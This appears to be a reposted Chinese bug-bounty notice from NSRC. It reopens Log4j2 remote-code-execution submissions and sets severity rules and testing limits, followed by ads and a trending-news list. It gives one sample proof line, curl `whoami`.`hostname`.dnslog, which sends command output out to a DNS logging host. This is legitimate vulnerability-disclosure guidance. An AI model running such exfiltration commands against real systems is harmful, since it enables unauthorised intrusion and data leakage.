关于开始接收Log4j2远程代码执行漏洞的通知二
致各位亲爱的白帽子:
经过第一阶段log4j漏洞的收集和跟进,NSRC将于6月9日开始开放全部业务接收Apache Log4j2相关漏洞。
1、发现目标存在log4j漏洞后,其评级标准:
证明能执行命令为高危,参照格式curl `whoami`.`hostname`.dnslog;证明通过${hostName}获取hostname的为低危。
2、不允许测试过程中进行写入文件、反弹shell、内网渗透等恶意操作,否则该行为视为违规,情节严重者将追究法律责任。更多细节请参考《src行业安全测试规范》。
3、在漏洞未经修复前,严禁对外披露漏洞详情,否则将取消所有奖励。
4、漏洞等级会按照漏洞实际影响和危害会进行调整。
5、Apache Log4j2漏洞不参与任何活动,包括但不限于主打产品、积分翻倍、年度季度奖励等。
感谢各位的支持与理解~
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 奋力打开改革发展新天地 7905264
- 2 中方回应特朗普威胁收回巴拿马运河 7953190
- 3 刘强东提前发年终奖 7897090
- 4 “冷资源”里的“热经济” 7789552
- 5 汪小菲内涵大S 7605510
- 6 国足原主帅李铁已上诉 7585055
- 7 张惠妹演唱会引居民楼地震 7487032
- 8 山姆代购在厕所分装蛋糕 7302870
- 9 唐尚珺与初恋因反复复读分手 7210667
- 10 男子闪婚生女后发现妻子结过7次婚 7134938